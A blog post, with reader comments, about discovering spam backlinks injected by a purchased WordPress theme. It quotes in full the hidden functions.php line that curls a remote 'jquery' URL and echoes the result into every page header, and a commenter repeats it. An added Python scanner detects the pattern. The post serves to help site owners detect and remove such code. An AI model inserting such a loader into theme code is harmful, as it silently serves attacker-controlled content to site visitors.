WordPress Hacked: Spam BackLinks

As you may recall, I switched my WordPress theme two months ago, and installed a new theme called PixelPower. If you read my previous post, I had disabled W3 Total Cache Minify and replaced it with Better WordPress Minify.

So after successfully implementing the W3 Total Cache minify on another blog I decided to give mine a second chance; the problem I found was that it takes a few seconds for W3TC to write it to disk, and my Amazon CloudFront gets a 404 the first time it tries to hit it … After a second attempt it seems to be working fine.

To my surprise however, while debugging and looking at my HTML source code I noticed something unusual – WordPress hacked! A bunch of links were injected pointing to care2.com! So I did a little digging and I found that it was a big problem with jQuery being injected by wpstats.org. Not my case, but I did find the problem. Open your functions.php file and if the 2nd line reads:

if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

Then your theme will automatically add spam backlinks… What annoys me the most is that I only found out now, after two months with the new template. So if you buy WordPress themes, especially from an unknown source – beware of sneaky spam links added to the original theme.

I deleted said line and all the backlinks disappeared.
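
A defensive check for the pattern described above, as an added example that is not part of the original post: a Python sketch that flags theme callbacks hooked to wp_head or wp_footer which fetch remote data and echo it into the page. The function names, the heuristics and the example.invalid sample host are assumptions; both samples are constructed.

```python
import re
from pathlib import Path

# Heuristic patterns (assumptions of this example, not an exhaustive signature set).
HOOK_RE = re.compile(r"add_action\(\s*['\"](wp_head|wp_footer)['\"]\s*,\s*['\"](\w+)['\"]")
FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents|wp_remote_get)\s*\(")
URL_RE = re.compile(r"https?://[^\s'\"]+")
ECHO_RE = re.compile(r"\b(echo|print)\b")

def function_body(src, name):
    """Return the brace-delimited body of PHP function `name`, or '' if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(src) and depth:  # naive brace matching, ignores braces in strings
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def scan_source(src):
    """Find callbacks hooked into page output that fetch remote data and echo it."""
    findings = []
    for hook, callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        if FETCH_RE.search(body) and ECHO_RE.search(body):
            findings.append({"hook": hook, "callback": callback,
                             "urls": URL_RE.findall(body)})
    return findings

def scan_theme(theme_dir):
    """Scan every .php file under a theme directory; returns {path: findings}."""
    report = {}
    for path in Path(theme_dir).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed samples: one with the same shape as the injected line, one harmless hook.
SUSPICIOUS = """<?php
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://cdn.example.invalid/jquery-1.6.3.min.js";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
"""
BENIGN = """<?php
function mytheme_meta(){ echo '<meta name="generator" content="mytheme">'; }
add_action('wp_head', 'mytheme_meta');
"""

if __name__ == "__main__":
    print(scan_source(SUSPICIOUS))
```

Point `scan_theme` at the theme folder under wp-content/themes and read every hit by hand: the heuristics miss obfuscated loaders and can flag legitimate remote fetches.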

  • KK

    Thanks! Helped me loads. Combing through my code right now!!!

  • Jeferex

    Great Post, You saved my day! :D
    My WordPress blog had been hacked but now it is ok

    Thanks a lot!

  • Gustavocampeol

    I noticed that my site was hacked 3 weeks ago and since then I've been trying to find the problem.
    Thank you so much, man! 

  • Ademola Oladipo

    This occurrence is common among pirated themes. I have quite a few myself and they lurk in some other places beyond the functions.php. Check if the functions.php includes any suspicious files with a recently updated timestamp different from the other files.

  • Vinicio brasil bahia

    THANK YOUUU!!! You helped me a lot here in BRAZIL! From SALVADOR in BAHIA, HUGS.. thank you very much

  • Segalapromo

    Thank you for your advice, my web is normal again.

  • Mladen Vlalukin

    In my functions.php

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    require_once(get_template_directory() . '/includes/init.php');

    I removed it, but nothing.
    If you can help,
    thanks.

  • http://www.dragonseo.net/ Dich vu SEO

    I don’t know remove attributes.

  • Mareksmialy111

    Hehe I had the same thing on my blog http://7hacks.com/

  • http://www.yepi250.com/ yepi

    Great. Really your post is very helpful.
